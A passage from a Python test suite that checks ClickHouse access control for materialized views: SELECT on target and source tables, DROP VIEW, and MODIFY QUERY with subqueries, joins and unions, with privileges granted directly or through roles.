            node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")

        with Then("I attempt to SELECT from the implicit target table as the user"):
            node.query(
                f"SELECT * FROM {implicit_table_name}",
                settings=[("user", f"{user_name}")],
                exitcode=exitcode,
                message=message,
            )

        # Only a grant on the inner table itself allows the read.
        with When("I grant SELECT privilege on the target table"):
            node.query(f"GRANT SELECT ON {implicit_table_name} TO {grant_target_name}")

        with Then("I attempt to SELECT from the implicit target table as the user"):
            node.query(
                f"SELECT * FROM {implicit_table_name}",
                settings=[("user", f"{user_name}")],
            )
    finally:
        with Finally("I drop the view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
@Requirements(RQ_SRS_006_RBAC_MaterializedView_Select_TargetTable("1.0"))
def select_from_explicit_target_table_privilege_granted_directly_or_via_role(
    self, node=None
):
    """Check that user is able to SELECT from the explicit target table created from a materialized view
    if they have SELECT privilege on that table.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"

    if node is None:
        node = self.context.node

    # Run the outline twice: direct grants, then grants through a role.
    with user(node, f"{user_name}"):
        Scenario(
            test=select_from_explicit_target_table,
            name="select from explicit target table, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)

    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")

        Scenario(
            test=select_from_explicit_target_table,
            name="select from explicit target table, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_from_explicit_target_table(self, grant_target_name, user_name, node=None):
    """Grant SELECT on the explicit target table and check the user is able to SELECT only if they have SELECT privilege on the table."""
    view_name = f"view_{getuid()}"
    table_name = f"table_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")

    if node is None:
        node = self.context.node

    with table(node, f"{table_name}"):
        try:
            with Given("I have a view"):
                # Explicit target table via the TO clause.
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} TO {table_name} AS SELECT 1"
                )

            # No grants yet: reading the target table must fail.
            with Then("I attempt to SELECT from the explicit target table as the user"):
                node.query(
                    f"SELECT * FROM {table_name}",
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )

            # SELECT on the view does NOT extend to its target table.
            with When("I grant SELECT privilege on the view"):
                node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")

            with Then("I attempt to SELECT from the explicit target table as the user"):
                node.query(
                    f"SELECT * FROM {table_name}",
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )

            # Only a grant on the target table itself allows the read.
            with When("I grant SELECT privilege on the target table"):
                node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")

            with Then("I attempt to SELECT from the explicit target table as the user"):
                node.query(
                    f"SELECT * FROM {table_name}", settings=[("user", f"{user_name}")]
                )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
@Requirements(RQ_SRS_006_RBAC_MaterializedView_Select_SourceTable("1.0"))
def select_from_source_table_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to SELECT from the source table of a materialized view
    if they have SELECT privilege on that table.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"

    if node is None:
        node = self.context.node

    # Run the outline twice: direct grants, then grants through a role.
    with user(node, f"{user_name}"):
        Scenario(
            test=select_from_source_table,
            name="select from source table, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)

    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")

        Scenario(
            test=select_from_source_table,
            name="select from source table, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_from_source_table(self, grant_target_name, user_name, node=None):
    """Grant SELECT on the source table and check the user is able to SELECT only if they have SELECT privilege on the table."""
    view_name = f"view_{getuid()}"
    table_name = f"table_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")

    if node is None:
        node = self.context.node

    with table(node, f"{table_name}"):
        try:
            with Given("I have a view"):
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table_name}"
                )

            # No grants yet: reading the source table must fail.
            with Then("I attempt to SELECT from the source table as the user"):
                node.query(
                    f"SELECT * FROM {table_name}",
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )

            # SELECT on the view does NOT extend to its source table.
            # BUG FIX: the remaining step names said "implicit target table" /
            # "target table" — copy-paste from select_from_implicit_target_table.
            # This outline tests the SOURCE table, so the step names now say so.
            with When("I grant SELECT privilege on the view"):
                node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")

            with Then("I attempt to SELECT from the source table as the user"):
                node.query(
                    f"SELECT * FROM {table_name}",
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )

            # Only a grant on the source table itself allows the read.
            with When("I grant SELECT privilege on the source table"):
                node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")

            with Then("I attempt to SELECT from the source table as the user"):
                node.query(
                    f"SELECT * FROM {table_name}", settings=[("user", f"{user_name}")]
                )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestSuite
@Requirements(
    RQ_SRS_006_RBAC_MaterializedView_Drop("1.0"),
)
def drop(self, node=None):
    """Test the RBAC functionality of the `DROP VIEW` command."""
    # Positive (privilege granted) and negative (privilege revoked) paths.
    Scenario(
        run=drop_with_privilege_granted_directly_or_via_role,
        setup=instrument_clickhouse_server_log,
    )
    Scenario(
        run=drop_with_revoked_privilege_revoked_directly_or_from_role,
        setup=instrument_clickhouse_server_log,
    )
@TestScenario
def drop_with_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to drop view with DROP VIEW privilege if the user has privilege directly or through a role."""
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"

    if node is None:
        node = self.context.node

    # Run the outline twice: direct grants, then grants through a role.
    with user(node, f"{user_name}"):
        Scenario(test=drop_with_privilege, name="drop privilege granted directly")(
            grant_target_name=user_name, user_name=user_name
        )

    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")

        Scenario(
            test=drop_with_privilege, name="drop privilege granted through a role"
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def drop_with_privilege(self, grant_target_name, user_name, node=None):
    """Grant DROP VIEW privilege and check the user is able to successfully drop a view."""
    view_name = f"view_{getuid()}"
    # After a successful drop, selecting from the view must report that the
    # table does not exist.
    exitcode, message = errors.table_does_not_exist(name=f"default.{view_name}")

    if node is None:
        node = self.context.node

    try:
        with Given("I have a view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
            node.query(
                f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
            )

        with When("I grant DROP VIEW privilege"):
            node.query(f"GRANT DROP VIEW ON {view_name} TO {grant_target_name}")

        with And("I drop the view as the user"):
            node.query(f"DROP VIEW {view_name}", settings=[("user", f"{user_name}")])

        # Verify the drop actually took effect.
        with Then("I check the table does not exist"):
            node.query(f"SELECT * FROM {view_name}", exitcode=exitcode, message=message)
    finally:
        with Finally("I drop the view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def drop_with_revoked_privilege_revoked_directly_or_from_role(self, node=None):
    """Check that user is unable to drop view with DROP VIEW privilege revoked directly or from a role."""
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"

    if node is None:
        node = self.context.node

    # Run the outline twice: revoke from the user, then revoke from the role.
    with user(node, f"{user_name}"):
        Scenario(
            test=drop_with_revoked_privilege, name="drop privilege revoked directly"
        )(grant_target_name=user_name, user_name=user_name)

    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")

        Scenario(
            test=drop_with_revoked_privilege, name="drop privilege revoked from a role"
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def drop_with_revoked_privilege(self, grant_target_name, user_name, node=None):
    """Revoke DROP VIEW privilege and check the user is unable to DROP a view."""
    view_name = f"view_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")

    if node is None:
        node = self.context.node

    try:
        with Given("I have a view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
            node.query(
                f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
            )

        # Grant then revoke so the revoke path itself is exercised.
        with When("I grant DROP VIEW privilege"):
            node.query(f"GRANT DROP VIEW ON {view_name} TO {grant_target_name}")

        with And("I revoke DROP VIEW privilege"):
            node.query(f"REVOKE DROP VIEW ON {view_name} FROM {grant_target_name}")

        # The drop attempt must fail with "not enough privileges".
        with Then("I drop the view as the user"):
            node.query(
                f"DROP VIEW {view_name}",
                settings=[("user", f"{user_name}")],
                exitcode=exitcode,
                message=message,
            )
    finally:
        with Finally("I drop the view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestSuite
@Requirements(
    RQ_SRS_006_RBAC_MaterializedView_ModifyQuery("1.0"),
)
def modify_query(self, node=None):
    """Test the RBAC functionality of the `MODIFY QUERY` command."""
    if node is None:
        node = self.context.node

    # ALTER ... MODIFY QUERY on materialized views requires the experimental
    # setting for the duration of every scenario in this suite.
    with allow_experimental_alter_materialized_view_structure(node):
        Scenario(
            run=modify_query_with_privilege_granted_directly_or_via_role,
            setup=instrument_clickhouse_server_log,
        )
        Scenario(
            run=modify_query_with_privilege_revoked_directly_or_from_role,
            setup=instrument_clickhouse_server_log,
        )
        Scenario(
            run=modify_query_without_source_table_privilege,
            setup=instrument_clickhouse_server_log,
        )
        Scenario(
            run=modify_query_with_source_table_privilege_granted_directly_or_via_role,
            setup=instrument_clickhouse_server_log,
        )
        Scenario(
            run=modify_query_with_subquery_privilege_granted_directly_or_via_role,
            setup=instrument_clickhouse_server_log,
        )
        Scenario(
            run=modify_query_with_join_query_privilege_granted_directly_or_via_role,
            setup=instrument_clickhouse_server_log,
        )
        Scenario(
            run=modify_query_with_union_query_privilege_granted_directly_or_via_role,
            setup=instrument_clickhouse_server_log,
        )
        Scenario(
            run=modify_query_with_join_union_subquery_privilege_granted_directly_or_via_role,
            setup=instrument_clickhouse_server_log,
        )
        Scenario(
            run=modify_query_with_nested_views_privilege_granted_directly_or_via_role,
            setup=instrument_clickhouse_server_log,
        )
@TestScenario
def modify_query_with_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to modify view with MODIFY QUERY if the user has privilege directly or through a role."""
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"

    if node is None:
        node = self.context.node

    # Run the inner test twice: direct grants, then grants through a role.
    with user(node, f"{user_name}"):
        Scenario(
            test=modify_query_with_privilege,
            name="modify query privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)

    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")

        Scenario(
            test=modify_query_with_privilege,
            name="modify query privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
# NOTE(review): decorated @TestScenario but invoked via Scenario(test=...) like
# the @TestOutline siblings — confirm whether this should be @TestOutline for
# consistency with the rest of the file.
@TestScenario
def modify_query_with_privilege(self, grant_target_name, user_name, node=None):
    """Grant MODIFY QUERY and check that user is able to execute it."""
    view_name = f"view_{getuid()}"

    if node is None:
        node = self.context.node

    try:
        with Given("I have a view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
            node.query(
                f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
            )

        with When("I grant MODIFY QUERY privilege"):
            node.query(
                f"GRANT ALTER VIEW MODIFY QUERY ON {view_name} TO {grant_target_name}"
            )

        # With the privilege granted, the ALTER must succeed.
        with Then("I modify the view query as the user"):
            node.query(
                f"ALTER TABLE {view_name} MODIFY QUERY SELECT 2",
                settings=[("user", f"{user_name}")],
            )
    finally:
        with Finally("I drop the view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def modify_query_with_privilege_revoked_directly_or_from_role(self, node=None):
    """Check that user is unable to modify the view query with MODIFY QUERY if the privilege has been revoked, directly or from a role."""
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"

    if node is None:
        node = self.context.node

    # Run the inner test twice: revoke from the user, then revoke from the role.
    with user(node, f"{user_name}"):
        Scenario(
            test=modify_query_with_revoked_privilege,
            name="modify query privilege revoked directly",
        )(grant_target_name=user_name, user_name=user_name)

    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")

        Scenario(
            test=modify_query_with_revoked_privilege,
            name="modify query privilege revoked from a role",
        )(grant_target_name=role_name, user_name=user_name)
# NOTE(review): decorated @TestScenario but invoked via Scenario(test=...) like
# the @TestOutline siblings — confirm whether this should be @TestOutline for
# consistency with the rest of the file.
@TestScenario
def modify_query_with_revoked_privilege(self, grant_target_name, user_name, node=None):
    """Revoke MODIFY QUERY and check that user is unable to modify the view query."""
    view_name = f"view_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")

    if node is None:
        node = self.context.node

    try:
        with Given("I have a view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
            node.query(
                f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
            )

        # Grant then revoke so the revoke path itself is exercised.
        with When("I grant MODIFY QUERY privilege"):
            node.query(
                f"GRANT ALTER VIEW MODIFY QUERY ON {view_name} TO {grant_target_name}"
            )

        with And("I revoke MODIFY QUERY privilege"):
            node.query(
                f"REVOKE ALTER VIEW MODIFY QUERY ON {view_name} FROM {grant_target_name}"
            )

        # The ALTER must now fail with "not enough privileges".
        with Then("I modify the view query as the user"):
            node.query(
                f"ALTER TABLE {view_name} MODIFY QUERY SELECT 2",
                settings=[("user", f"{user_name}")],
                exitcode=exitcode,
                message=message,
            )
    finally:
        with Finally("I drop the view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def modify_query_without_source_table_privilege(self, node=None):
    """Check that user is unable to modify the view query to have a source table in the stored query
    without SELECT privilege for the new source table.
    """
    user_name = f"user_{getuid()}"
    view_name = f"view_{getuid()}"
    table_name = f"table_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")

    if node is None:
        node = self.context.node

    with table(node, f"{table_name}"):
        with user(node, f"{user_name}"):
            try:
                with When("I create a view"):
                    node.query(f"DROP VIEW IF EXISTS {view_name}")
                    node.query(
                        f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
                    )

                with And("I grant view MODIFY QUERY privilege to the user"):
                    node.query(
                        f"GRANT ALTER VIEW MODIFY QUERY ON {view_name} TO {user_name}"
                    )

                # MODIFY QUERY on the view is not enough: the new stored query
                # pulls in table_name, which the user has no SELECT on.
                with Then(
                    "I attempt to use MODIFY QUERY on the view without privilege on the source table"
                ):
                    node.query(
                        f"ALTER TABLE {view_name} MODIFY QUERY SELECT * FROM {table_name}",
                        settings=[("user", f"{user_name}")],
                        exitcode=exitcode,
                        message=message,
                    )
            finally:
                with Finally("I drop the view"):
                    node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def modify_query_with_source_table_privilege_granted_directly_or_via_role(
    self, node=None
):
    """Check that user is able to modify the view query to have a source table in the stored query, if and only if
    the user has SELECT privilege for the view and the source table, either directly or from a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"

    if node is None:
        node = self.context.node

    # Run the outline twice: direct grants, then grants through a role.
    with user(node, f"{user_name}"):
        Scenario(
            test=modify_query_with_source_table_privilege,
            name="modify query with source table, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)

    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")

        Scenario(
            test=modify_query_with_source_table_privilege,
            name="modify query with source table, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def modify_query_with_source_table_privilege(
    self, user_name, grant_target_name, node=None
):
    """Grant MODIFY QUERY privilege on view and SELECT privilege on the new source table and check the user is able to modify the view query."""
    view_name = f"view_{getuid()}"
    table_name = f"table_{getuid()}"

    if node is None:
        node = self.context.node

    with table(node, f"{table_name}"):
        try:
            with Given("I have a view with a source table"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
                )

            with And("I grant view MODIFY QUERY privilege"):
                node.query(
                    f"GRANT ALTER VIEW MODIFY QUERY ON {view_name} TO {grant_target_name}"
                )

            with And("I grant table SELECT privilege"):
                node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")

            # With both MODIFY QUERY on the view and SELECT on the new source
            # table, the ALTER must succeed.
            with Then("I check the user is able to modify the view query"):
                node.query(
                    f"ALTER TABLE {view_name} MODIFY QUERY SELECT * FROM {table_name}",
                    settings=[("user", f"{user_name}")],
                )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def modify_query_with_subquery_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to modify the view query to use a query with two subqueries if and only if
    the user has MODIFY QUERY privilege for that view and SELECT for all the tables, either directly or through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"

    if node is None:
        node = self.context.node

    # Run the outline twice: direct grants, then grants through a role.
    with user(node, f"{user_name}"):
        Scenario(
            test=modify_query_with_subquery,
            name="modify query with subquery, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)

    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")

        Scenario(
            test=modify_query_with_subquery,
            name="modify query with subquery, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def modify_query_with_subquery(self, user_name, grant_target_name, node=None):
    """Grant MODIFY QUERY on the view and SELECT on tables included in the MODIFY QUERY statement and check the user is able to modify the view query
    if and only if they have SELECT privilege on all of the tables.
    """
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    table2_name = f"table2_{getuid()}"
    # Expected failure for every attempt made without full SELECT coverage.
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    # Template with two nested subqueries touching all three tables.
    modify_query_view_query = "ALTER TABLE {view_name} MODIFY QUERY SELECT * FROM {table0_name} WHERE y IN (SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table2_name} WHERE y<2))"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name},{table2_name}"):
        try:
            with Given("I have a view with a subquery"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
                )
            with When("I grant MODIFY QUERY privilege on view"):
                node.query(
                    f"GRANT ALTER VIEW MODIFY QUERY ON {view_name} TO {grant_target_name}"
                )
            # Without SELECT on any source table the ALTER must be rejected.
            with Then("I attempt to modify the view query as the user"):
                node.query(
                    modify_query_view_query.format(
                        view_name=view_name,
                        table0_name=table0_name,
                        table1_name=table1_name,
                        table2_name=table2_name,
                    ),
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
            # Each permutation presumably grants SELECT on a strict subset of
            # the three tables; the ALTER must keep failing until every table
            # is covered — TODO confirm grant_select_on_table semantics.
            for permutation in permutations(table_count=3):
                with grant_select_on_table(
                    node,
                    permutation,
                    grant_target_name,
                    table0_name,
                    table1_name,
                    table2_name,
                ) as tables_granted:
                    with When(
                        f"permutation={permutation}, tables granted = {tables_granted}"
                    ):
                        with Then("I attempt to modify the view query as the user"):
                            node.query(
                                modify_query_view_query.format(
                                    view_name=view_name,
                                    table0_name=table0_name,
                                    table1_name=table1_name,
                                    table2_name=table2_name,
                                ),
                                settings=[("user", f"{user_name}")],
                                exitcode=exitcode,
                                message=message,
                            )
            with When("I grant select on all tables"):
                # max(permutations(...)) + 1 presumably encodes "SELECT on
                # every table" — verify against grant_select_on_table.
                with grant_select_on_table(
                    node,
                    max(permutations(table_count=3)) + 1,
                    grant_target_name,
                    table0_name,
                    table1_name,
                    table2_name,
                ):
                    with Then("I attempt to modify the view query as the user"):
                        output = node.query(
                            modify_query_view_query.format(
                                view_name=view_name,
                                table0_name=table0_name,
                                table1_name=table1_name,
                                table2_name=table2_name,
                            ),
                            settings=[("user", f"{user_name}")],
                        ).output
                        # NOTE(review): a successful MODIFY QUERY is expected
                        # to yield output "0" here — TODO confirm.
                        assert output == "0", error()
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def modify_query_with_join_query_privilege_granted_directly_or_via_role(
    self, node=None
):
    """Check that the user can modify the view query to one containing a `JOIN`
    if and only if they hold SELECT on all the tables and MODIFY QUERY on the
    view, either directly or through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    node = self.context.node if node is None else node

    # Case 1: privileges granted directly to the user.
    with user(node, user_name):
        direct = Scenario(
            test=modify_query_with_join_query,
            name="modify query with join, privilege granted directly",
        )
        direct(grant_target_name=user_name, user_name=user_name)

    # Case 2: privileges granted through a role held by the user.
    with user(node, user_name), role(node, role_name):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        via_role = Scenario(
            test=modify_query_with_join_query,
            name="modify query with join, privilege granted through a role",
        )
        via_role(grant_target_name=role_name, user_name=user_name)
@TestOutline
def modify_query_with_join_query(self, user_name, grant_target_name, node=None):
    """Grant MODIFY QUERY on the view and SELECT on the tables in the modified query and check the user is able to modify the view query to
    use a `JOIN` statement if and only if they have SELECT privilege on all of them.
    """
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    # Expected failure for every attempt made without full SELECT coverage.
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    # Template joining both tables on column d.
    modify_query_view_query = "ALTER TABLE {view_name} MODIFY QUERY SELECT * FROM {table0_name} JOIN {table1_name} USING d"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name}"):
        try:
            with Given("I have a view with a JOIN statement"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
                )
            with When("I grant MODIFY QUERY privilege on view"):
                node.query(
                    f"GRANT ALTER VIEW MODIFY QUERY ON {view_name} TO {grant_target_name}"
                )
            # Without SELECT on any joined table the ALTER must be rejected.
            with Then("I attempt to modify the view query as the user"):
                node.query(
                    modify_query_view_query.format(
                        view_name=view_name,
                        table0_name=table0_name,
                        table1_name=table1_name,
                    ),
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
            # Partial SELECT grants — ALTER must keep failing for each subset.
            for permutation in permutations(table_count=2):
                with grant_select_on_table(
                    node, permutation, grant_target_name, table0_name, table1_name
                ) as tables_granted:
                    with When(
                        f"permutation={permutation}, tables granted = {tables_granted}"
                    ):
                        with Then("I attempt to modify the view query as the user"):
                            node.query(
                                modify_query_view_query.format(
                                    view_name=view_name,
                                    table0_name=table0_name,
                                    table1_name=table1_name,
                                ),
                                settings=[("user", f"{user_name}")],
                                exitcode=exitcode,
                                message=message,
                            )
            # With SELECT on every table the ALTER must succeed.
            with When("I grant select on all tables"):
                with grant_select_on_table(
                    node,
                    max(permutations(table_count=2)) + 1,
                    grant_target_name,
                    table0_name,
                    table1_name,
                ):
                    with Then("I attempt to modify the view query as the user"):
                        node.query(
                            modify_query_view_query.format(
                                view_name=view_name,
                                table0_name=table0_name,
                                table1_name=table1_name,
                            ),
                            settings=[("user", f"{user_name}")],
                        )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def modify_query_with_union_query_privilege_granted_directly_or_via_role(
    self, node=None
):
    """Check that the user can modify the view query to include a `UNION ALL`
    if and only if they hold SELECT on all the tables and MODIFY QUERY on the
    view, either directly or through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    node = self.context.node if node is None else node

    # Case 1: privileges granted directly to the user.
    with user(node, user_name):
        direct = Scenario(
            test=modify_query_with_union_query,
            name="modify query with union, privilege granted directly",
        )
        direct(grant_target_name=user_name, user_name=user_name)

    # Case 2: privileges granted through a role held by the user.
    with user(node, user_name), role(node, role_name):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        via_role = Scenario(
            test=modify_query_with_union_query,
            name="modify query with union, privilege granted through a role",
        )
        via_role(grant_target_name=role_name, user_name=user_name)
@TestOutline
def modify_query_with_union_query(self, user_name, grant_target_name, node=None):
    """Grant MODIFY QUERY on the view and SELECT on the tables in the stored query and check the user is able modify the view query if and only if they have SELECT privilege on all of them."""
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    # Expected failure for every attempt made without full SELECT coverage.
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    # Template combining both tables with UNION ALL.
    modify_query_view_query = "ALTER TABLE {view_name} MODIFY QUERY SELECT * FROM {table0_name} UNION ALL SELECT * FROM {table1_name}"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name}"):
        try:
            with Given("I have a view with a UNION statement"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
                )
            with When("I grant MODIFY QUERY privilege on view"):
                node.query(
                    f"GRANT ALTER VIEW MODIFY QUERY ON {view_name} TO {grant_target_name}"
                )
            # Without SELECT on any unioned table the ALTER must be rejected.
            with Then("I attempt to modify the view query as the user"):
                node.query(
                    modify_query_view_query.format(
                        view_name=view_name,
                        table0_name=table0_name,
                        table1_name=table1_name,
                    ),
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
            # Partial SELECT grants — ALTER must keep failing for each subset.
            for permutation in permutations(table_count=2):
                with grant_select_on_table(
                    node, permutation, grant_target_name, table0_name, table1_name
                ) as tables_granted:
                    with When(
                        f"permutation={permutation}, tables granted = {tables_granted}"
                    ):
                        with Then("I attempt to modify the view query as the user"):
                            node.query(
                                modify_query_view_query.format(
                                    view_name=view_name,
                                    table0_name=table0_name,
                                    table1_name=table1_name,
                                ),
                                settings=[("user", f"{user_name}")],
                                exitcode=exitcode,
                                message=message,
                            )
            # With SELECT on every table the ALTER must succeed.
            with When("I grant select on all tables"):
                with grant_select_on_table(
                    node,
                    max(permutations(table_count=2)) + 1,
                    grant_target_name,
                    table0_name,
                    table1_name,
                ):
                    with Then("I attempt to modify the view query as the user"):
                        node.query(
                            modify_query_view_query.format(
                                view_name=view_name,
                                table0_name=table0_name,
                                table1_name=table1_name,
                            ),
                            settings=[("user", f"{user_name}")],
                        )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def modify_query_with_join_union_subquery_privilege_granted_directly_or_via_role(
    self, node=None
):
    """Check that the user can modify the view query to include `UNION ALL`,
    `JOIN` and two subqueries if and only if they hold SELECT on all the tables
    and the view, either directly or through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    node = self.context.node if node is None else node

    # Case 1: privileges granted directly to the user.
    with user(node, user_name):
        direct = Scenario(
            test=modify_query_with_join_union_subquery,
            name="modify query with join union subquery, privilege granted directly",
        )
        direct(grant_target_name=user_name, user_name=user_name)

    # Case 2: privileges granted through a role held by the user.
    with user(node, user_name), role(node, role_name):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        via_role = Scenario(
            test=modify_query_with_join_union_subquery,
            name="modify query with join union subquery, privilege granted through a role",
        )
        via_role(grant_target_name=role_name, user_name=user_name)
@TestOutline
def modify_query_with_join_union_subquery(
    self, grant_target_name, user_name, node=None
):
    """Grant MODIFY QUERY on the view and SELECT on tables in the modify query and check the user is able modify the view query
    if and only if they have SELECT privilege on all of them.
    """
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    table2_name = f"table2_{getuid()}"
    table3_name = f"table3_{getuid()}"
    table4_name = f"table4_{getuid()}"
    # Expected failure for every attempt made without full SELECT coverage.
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    # NOTE(review): the template references table1_name twice and never uses
    # table2_name (only passed as an unused .format() kwarg), although SELECT
    # on table2 is still granted below — possible typo; TODO confirm intent.
    modify_query_view_query = "ALTER TABLE {view_name} MODIFY QUERY SELECT y FROM {table0_name} JOIN {table1_name} USING y UNION ALL SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table3_name} WHERE y IN (SELECT y FROM {table4_name} WHERE y<2))"
    if node is None:
        node = self.context.node
    with table(
        node, f"{table0_name},{table1_name},{table2_name},{table3_name},{table4_name}"
    ):
        try:
            with Given("I have a view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
                )
            with When("I grant MODIFY QUERY privilege on view"):
                node.query(
                    f"GRANT ALTER VIEW MODIFY QUERY ON {view_name} TO {grant_target_name}"
                )
